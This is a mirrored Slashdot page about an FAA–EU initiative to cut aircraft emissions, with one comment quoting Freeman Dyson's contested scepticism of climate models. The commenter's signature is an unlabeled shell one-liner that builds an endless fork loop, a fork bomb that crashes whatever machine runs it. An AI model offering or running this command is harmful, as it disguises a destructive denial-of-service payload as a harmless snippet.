Slashdot Mirror


FAA Plans to Clean Up the Skies

coondoggie writes "On top of its recently announced plan to reduce flight delays, Federal Aviation Administration officials today launched what they hope will be pan U.S. and European Union joint action plan to cut greenhouse gas emissions from aircraft. Specifically the group announced the Atlantic Interoperability Initiative to Reduce Emissions or AIRE — the first large-scale environmental plan aimed at uniting aviation players from both sides of the Atlantic."

1 of 249 comments (clear)

  1. Re:The cult of Global Warming by Hal_Porter · · Score: 5, Interesting

    Freeman Dyson on Climate Models
    The first of my heresies says that all the fluff about global warming is grossly exaggerated. Here I am opposing the holy brotherhood of twilight model experts and the crowd of diluted citizens that believe the numbers predicted by their models. Of course they say I have no degree in meteorology and I am therefore not qualified to speak.

    But I have studied their climate models and know what they can do. The models solve the equations of fluid dynamics and do a very good job of describing the fluid motions of the atmosphere and the oceans. They do a very poor job of describing the clouds, the dust, the chemistry and the biology of fields, farms and forests. They do not begin to describe the real world that we live in.

    The real world is muddy and messy and full of things that we do not yet understand. It is much easier for a scientist to sit in an air-conditioned building and run computer models than to put on winter clothes and measure what is really happening outside in the swamps and the clouds. That's why the climate model experts end up believing their own models.

    There's no doubt that parts of the world are getting warmer, but the warming is not global. The warming happens in places and times where it is cold, in the arctic more than the tropics, in the winter more than the summer, at night more than the daytime.

    I'm not saying the warming doesn't cause problems, obviously it does. Obviously we should be trying to understand it. I'm saying that the problems are being grossly exaggerated. They take away money and attention from other problems that are much more urgent and important. Poverty, infectious diseases, public education and public health. Not to mention the preservation of living creatures on land and in the oceans.


    He also worked out a way to reverse global warming quite cheaply.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;